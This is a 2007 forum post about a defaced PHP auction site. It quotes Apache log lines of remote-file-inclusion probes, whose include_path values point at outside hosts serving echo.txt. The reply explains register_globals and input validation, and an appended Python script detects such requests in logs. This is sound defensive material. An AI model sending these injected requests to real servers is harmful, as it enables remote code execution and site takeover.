Posted by Jerry Stuckle on 10/15/07 02:28
Charles Crume wrote:
> Hello Everyone;
>
> My site was hacked the other day -- someone was able to rename my
> index.shtml file and put their own index.html file on my server. Not sure
> how it was done, but looking through the log file, I found lots and lots
> of entries where an "include_path" parameter was included in the URL of the
> PHP page, as shown below:
>
> 69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
> /auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
> HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
>
> 69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
> HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
>
> 69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
> HTTP/1.0" 200 75 "-" "Mozilla/5.0"
>
> 213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1"
> 404 310 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1"
> 404 310 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
> /auction/item.php?id=268/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
> /includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
> /auction/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
>
> I know how "include_path" works when *in* the PHP file, but I'm not sure
> what the effect of including it in the URL is. A number of entries show a code
> 404 as the culprits are obviously phishing for pages, but requests with
> return code 200 are showing a large number of bytes transferred -- far
> larger than the PHP page itself.
>
> Can someone explain what adding "include_path" to a URL does?
>
> Is there something I need to check on my server or how I've got Apache
> configured?
>
> TIA.
>
> Charles...
>
The include_path itself in the URL is just a variable. It's what you do
with it that's important. For instance, if you have register_globals
enabled, the include_path in the URL may override the system include_path.
Or, depending on what else you do in your code. This is a big reason
why it's good to use $_POST instead of $_REQUEST if you're posting a
form to a page - $_POST will ignore any $_GET parameters.
And just another reason to *ALWAYS* validate data coming from the user.
--
==================
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp.
jstucklex@attglobal.net
==================
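One way to pick these requests out of an Apache log, added here as example code (it is not from the post), assuming the log is in Apache's combined format: it flags any query-string value that is itself an absolute URL, and marks the 200 responses, which the byte counts in the post suggest were the requests where the script actually ran with the injected value.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log: ip ident user [time] "method target proto" status bytes "referer" "agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
                    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "[^"]*" "(?P<ua>[^"]*)"$')
# A query value that is itself an absolute URL: exactly the input a remote-include bug would fetch.
REMOTE_URL_RE = re.compile(r'(?:^|[?&=])(?:https?|ftp)://', re.IGNORECASE)

# Log lines quoted in the post, plus one constructed benign request (10.0.0.7) as a control.
SAMPLE_LOG = """\
69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET /auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt? HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET /index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1" 404 310 "-" "libwww-perl/5.808"
10.0.0.7 - - [11/Oct/2007:16:02:10 -0400] "GET /auction/item.php?id=268 HTTP/1.1" 200 56446 "-" "Mozilla/5.0"
"""

def parse_log_line(line):
    """Fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def remote_include_params(target):
    """(name, value) pairs whose value carries an absolute URL. parse_qsl keeps everything after
    the first '=' as the value, so a URL hidden behind a second '?' (item.php?id=268/...?include_path=http://...)
    still lands inside some value and is caught."""
    return [(n, v) for n, v in parse_qsl(urlsplit(target).query, keep_blank_values=True)
            if REMOTE_URL_RE.search(v)]

def scan_log(text):
    """One finding per (request, tainted parameter). 'served' marks the 200s: the script ran with
    the attacker's value, and a byte count far above the page's normal size is the fetched file's
    output being sent back to the client, which is what the post observed."""
    findings = []
    for line in text.splitlines():
        e = parse_log_line(line)
        if not e:
            continue
        for name, value in remote_include_params(e["target"]):
            findings.append({"ip": e["ip"], "path": urlsplit(e["target"]).path, "param": name,
                             "remote": value, "status": int(e["status"]),
                             "bytes": 0 if e["bytes"] == "-" else int(e["bytes"]),
                             "ua": e["ua"], "served": e["status"] == "200"})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:15} {f['status']} {f['bytes']:>6} {f['path']} {f['param']}= {f['remote']}")
```

Lines where the URL rides inside the `id` parameter (the `item.php?id=268/...?include_path=` probes) are reported under `id`, since that is the parameter the server actually saw; the remote host is in the `remote` field either way.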